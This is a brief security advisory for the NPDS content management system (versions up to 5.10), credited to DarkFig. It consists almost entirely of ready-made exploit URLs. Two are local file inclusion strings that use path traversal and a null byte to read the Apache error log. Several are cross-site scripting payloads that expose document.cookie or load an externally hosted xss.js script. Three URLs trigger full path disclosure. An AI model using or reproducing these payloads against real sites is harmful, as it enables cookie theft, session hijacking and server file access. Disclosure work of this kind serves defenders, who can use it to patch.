NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure

// Script
Web -------- www.npds.org
versions — NPDS <= 5.10
Solutions – None official
Note ------- Vendor has been contacted

// Local Inclusion
http://[…]/header.php?Default_Theme=…/apache/logs/error.log%00
http://[…]/modules/cluster-paradise/cluster-E.php?ModPath=…/…/…/…/…/apache/logs/error.log%00

// Cross Site Scripting
http://[…]/header.php?Titlesitename=</title><script>alert(document.cookie)</script>
http://[…]/header.php?sitename="><script>alert(document.cookie)</script>
http://[…]/meta/meta.php?nuke_url="><script>alert(document.cookie)</script>
http://[…]/viewforum.php?forum=2"><script src=http://[…]/xss.js>
http://[…]/editpost.php?forum=1&post_id=888"><script src=http://[…]/xss.js>
http://[…]/editpost.php?forum=1"><script src=http://[…]/xss.js>
http://[…]/editpost.php?forum=1&topic="><script src=http://[…]/xss.js>
http://[…]/editpost.php?forum=1&arbre="><script src=http://[…]/xss.js>
http://[…]/user.php?op=only_newuser&uname="><script src=http://[…]/xss.js>
http://[…]/user.php?op=only_newuser&email="><script src=http://[…]/xss.js>

// Full Path Disclosure
http://[…]/header.php
http://[…]/modules/contact/contact.php
http://[…]/modules/sform/forum/forum_extender.php

// Credits
by DarkFig – http://www.acid-root.new.fr/advisories/npds510.txt